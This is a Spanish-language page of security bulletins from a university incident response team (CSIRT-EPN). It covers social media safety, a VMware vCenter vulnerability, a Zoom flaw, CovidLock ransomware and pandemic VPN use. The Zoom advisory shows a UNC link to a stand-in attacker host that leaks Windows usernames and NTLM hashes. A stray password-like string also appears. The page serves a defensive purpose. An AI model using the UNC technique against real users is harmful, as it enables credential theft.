esenfrdeitptru

Guías y mejores prácticas

BUENAS PRÁCTICAS DE SEGURIDAD EN EL USO DE REDES SOCIALES

BUENAS PRÁCTICAS DE SEGURIDAD EN EL USO DE REDES SOCIALES

Fecha: 17/04/2020

Las redes sociales son en la actualidad el vínculo entre una organización y su comunidad. Los riesgos existentes en el ciberespacio podrían afectar la imagen institucional o personal si un atacante toma el control de la cuenta de la red social, publicando información falsa, maliciosa o mal intencionada.

Las siguientes recomendaciones son indispensables acatarlas en el uso de redes sociales:

1. Apegarse a las directrices institucionales de contraseñas, la clave para acceder a redes sociales debe seguir similares directrices, es decir debe ser construida con una longitud de 10 caracteres, letras, números y símbolos, esta clave no utilizarla en los sistemas institucionales, ni sistemas financieros.

2. Configurar la cuenta de acceso a las redes sociales con doble factor de autenticación, es decir que requiera algún código de verificación enviado a un número de teléfono o a un correo electrónico.

3. Utilice su intuición o si sospecha de que una noticia es falsa, o tiene enlaces a sitios desconocidos, no de click, peor aún entregue información personal o contraseñas de acceso.

4. Animamos a los padres de familia de nuestra comunidad politécnica, a que eduquen a sus hijos en el uso de prácticas de Internet seguras. Por favor evitar publicar fotos con su hijos menores.

5. Encuentre un equilibrio entre lo que significa ofrecer un lugar en el que pueda expresarse con empatía y respeto a la vez promueva un entorno seguro y acogedor para todos.

6. Si sospecha que ha sido víctima de un atacante cibernético, notifique a gestióEsta dirección de correo electrónico está siendo protegida contra los robots de spam. Necesita tener JavaScript habilitado para poder verlo.

7. En computadoras así como también teléfonos móviles, tabletas, entre otros, utilice aplicaciones de seguridad que requieran contraseña para acceder a las redes sociales.

8. No grabar las contraseñas en los dispositivos que utilice, debe ser común que deba ingresar la contraseña para iniciar sesión.

9. Si observa que su cuenta ha sido clonada o hackeada repórtelo siguiendo las directrices que dan las redes sociales para el efecto:

Ayuda para reportar cuentas hackeadas, suplantación de identidad, cuentas ficticias: https://www.facebook.com/hacked;

Denunciar una cuenta comprometida: https://www.facebook.om/help/hacked

Denunciar suplantación de cuenta Twitter:

https://help.twitter.com/en/safety-and-security/report-twitter-impersonation

 

Referencia: https://www.facebook.com/about/privacy/minors

 

CSIRT-EPN

Vulnerabilidad de VMWare en su servicio de directorio

Alerta: VMWre Publica actualizaciones de seguridad para el servicio VMware Directory

 

Fecha: 13/04/2020

 

Severidad: Crítica

VMware ha publicado actualizaciones de seguridad para abordar una vulnerabilidad del servicio de directorio de VMware (vmdir). Un atacante puede aprovechar esta vulnerabilidad y tomar control de un sistema afectado.

Bajo determinadas condiciones el vmdir que se registra con VMware vCenter Server, como parte de una instancia de Platform Services Controller (PSC) integrada o externa, no implementa correctamente los controles de acceso.

 

Producto afectado: VMware vCenter Server. El VCenter Server versión 7 no está afectado.

 

Solución

Parchar la versión del producto afectado según la tabla referenciada en el siguiente enlace:  https://www.vmware.com/security/advisories/VMSA-2020-0006.html

 

Referencias

https://www.vmware.com/security/advisories/VMSA-2020-0006.html

https://nvd.nist.gov/vuln/detail/CVE-2020-3952#vulnCurrentDescriptionTitle

CSIRT-EPN

 

Lc3WC1S445*rd$

Vulnerabilidad ZOOM

ALERTA VULNERABILIDAD EN ZOOM

Fecha: 1 de abril de 2020

"En las últimas semanas, la crisis de COVID-19 ha significado que millones de personas se queden en casa trabajando. Las estimaciones varían, pero hasta el 50% de los empleados en todo el mundo ahora pueden trabajar de forma remota. Plataformas de comunicaciones en línea se han vuelto esenciales para las interacciones personales y comerciales con el resto del mundo, y con una participación de mercado global cercana al 20%, Zoom es una de las plataformas más populares ".

 

Patrick Wardle, un ex hacker informático de la NSA (National Security Agency), determina dos errores de Zoom, que se puede utilizar para robar contraseñas de Windows, el segundo error explota una falla en cómo Zoom maneja la cámara web y el micrófono en las Mac permitiendo tomar control de los mismos.

 

Los ataques funcionan mediante el uso de la ventana de chat Zoom para enviar a los objetivos una cadena de texto que representa la ubicación de red en el dispositivo Windows que están utilizando. La aplicación Zoom para Windows convierte automáticamente las llamadas cadenas de convenciones de nomenclatura universales, como \\ attacker.example.com/C$, en enlaces en los que se puede hacer clic. En el caso de que los objetivos hagan clic en esos enlaces en redes que no están completamente bloqueadas, Zoom enviará los nombres de usuario de Windows y los hashes NTLM correspondientes a la dirección contenida en el enlace a través del puerto 445, que se utiliza para transmitir el tráfico relacionado con los servicios de Windows SMB y Active Directory. Se indica que la empresa ZOOM ha lanzado una actualización de la aplicación.

 

Recomendaciones

  1. Mantener actualizada la aplicación: https://support.zoom.us/hc/en-us/articles/20131953-New-Updates-for-Windows .
  2. Evite dar a conocer sus clases o reuniones a través de las redes sociales.
  3. Usar contraseña de inicio de sesión, evitar utilizar el envío de invitación a través de la URL de la reunión, ya que esta opción no requiere contraseña.
  4. Administrar a los participantes, restringiendo el uso de cámara, micrófono y el compartir archivos.
  5. Administrar los participantes que pueden grabar la conversación.
  6. En la directiva de seguridad de red de Windows, restringir NTLM: tráfico saliente hacia servidores remotos.
  7. Bloquear el puerto 445.
  8. Permitir que solo usuarios registrados se unan a sus reuniones.
  9. Bloquear la reunión una vez comenzada.
  10. Eliminar participantes no deseados o perjudiciales.
  11. Evitar que los participantes eliminados vuelvan a unirse.
  12. Desactivar la transferencia de archivos.
  13. Desactivar anotación.
  14. Poner en espera a los participantes que producen una ruptura brusca.
  15. Deshabilitar chat privado.

 

Referencias

Aplicativo para Android que notifica sobre Coronavirus, es un Ransomware

Alerta CovidLock

Aplicativo para móvil Android que notifica noticias actuales del Coronavirus, es un Ransomware

 

Fecha de publicación: 16 de marzo de 2020

Los ciberdelincuentes se aprovechan de las personas cuando están en su punto más vulnerable, un sitio web (coronavirusapp.site) ha sido expuesto engañando a usuarios desprevenidos para que descarguen una aplicación de seguimiento del Coronavirus en sus teléfonos Android, cuando en realidad esta aplicación es un Ransomware denominado CovidLock.

Una vez instalado usa técnicas para denegar el acceso y altera la pantalla de bloqueo del dispositivo infectado, y exige un pago.

Siempre está la opción de resetar (a fábrica) el dispositivo, perdiendo todo el contenido no respaldado.

 

Solución

Evitar descargar software de sitios desconocidos, las noticias actuales tienen sitios conocidos donde puede informarse, favor no se descargue software para acceder a información actualizada sobre el Coronavirus, que la puede ubicar por otros medios.

 

Referencia

https://www.domaintools.com/resources/blog/covidlock-mobile-coronavirus-tracking-app-coughs-upransomware

https://www.hackread.com/coronavirus-tracking-app-ransomware-scam-locks-phones-ransom/

https://csirt.cedia.org.ec/2020/03/covidlock-aprovecha-el-temor-sobre-el-coronavirus-para-instalar-ransomware-de-bitcoin/

El uso de VPNs se ha disparado por el Covid-19

El uso de VPN podría incrementarse en un 150% en EEUU a medida que se extiende el Covid-19



Fecha de Publicación:  Marzo 17, 2020


Resumen:  "El uso de redes privadas virtuales (VPNS) se ha disparado en algunos de los países más afectados por el virus Covid-19, según nuevos datos de una empresa que suministra estos servicios.  Atlas VPN analizó los datos de sus 50.000 usuarios semanalmente, midiendo la cantidad de tráfico recorrido a través de sus servidores la semana pasada (9-15 de marzo) frente a la semana anterior (2-8 de marzo). Mientras que el número total de clientes se mantuvo relativamente igual durante las dos semanas, el uso aumentó en algunos de los países que más sufren el nuevo coronavirus.

 

El uso de VPN en Italia aumentó un 112% en la última semana, mientras que la cifra alcanzó el 38% en Irán y el 36% en España. En el momento de la redacción había 183.000 casos globales confirmados de Covid-19. Italia (28.000), Irán (15.000) y España (10.000) son los tres principales países afectados después de China, donde se originó el virus. Los respectivos gobiernos de Italia y España han emitido avisos de "bloqueo" que requieren que todos los ciudadanos se queden en casa, y bares, cafeterías, restaurantes, estadios, cines y museos se ordena su cierre. Se insta a trabajar en casa, siempre que sea posible.

 

En Irán, donde la cifra de muertos por el virus es de casi el 6%, el gobierno se ha visto obligado a liberar a 85.000 presos en un intento de prevenir brotes graves en las cárceles del país. Otros países donde Atlas VPN observó un repunte en el uso de VPN incluyó los EE.UU, donde hubo un aumento del 53% en el período de dos semanas".

 

Se estima que el uso de VPN en EEUU podría incrementarse en un 150% hasta finales del mes. Los empleados realizan una comunicación segura con la red corporativa.

 

 

Referencia

https://www.infosecurity-magazine.com/news/vpn-use-could-soar-150-us-covid19/

  • 1
  • 2

Cómo Citarnos

Castellano: CSIRTEPN - Grupo  Respuesta a Incidentes de Seguridad de la Escuela Politécnica Nacional

Otro idioma: CSIRTEPN – National Polytechnic School Computer Emergency Response Team

Concepto de incidente

“Evento inesperado que compromete la operación de un sistema y su información, amenazando la confidencialidad, integridad o disponibilidad”

Ver Lista de incidentes

Contáctenos

Para contactarse con nosotros y resolver tus dudas o inquietudes, escríbenos a:

Correo:team@csirt-epn.edu.ec

Dirección: Madrid y Toledo Edificio de Aulas y Relación con el Medio Externo (EARME)
Planta Baja (Centro de Datos)

Teléfono: (+593) 22976300 Ext. 1436, 1452, 1453

Horario de Atención: De lunes a Viernes de 8H00 - 18H00

 

Reportar Incidente

Puedes reportar tu incidente de los siguiente forma:

Escribenos al correo: gestion.incidentes@csirt-epn.edu.ec

Comunícate con nostros al: (593) 2 2976 300 ext 1452 1453

Repórtalo desde nuestro formulario aquí

No olvides incluir:

  • Nombres completos.
  • Correo electrónico
  • Teléfono – extensión
  • Dependencia-oficina
  • Comentario del incidente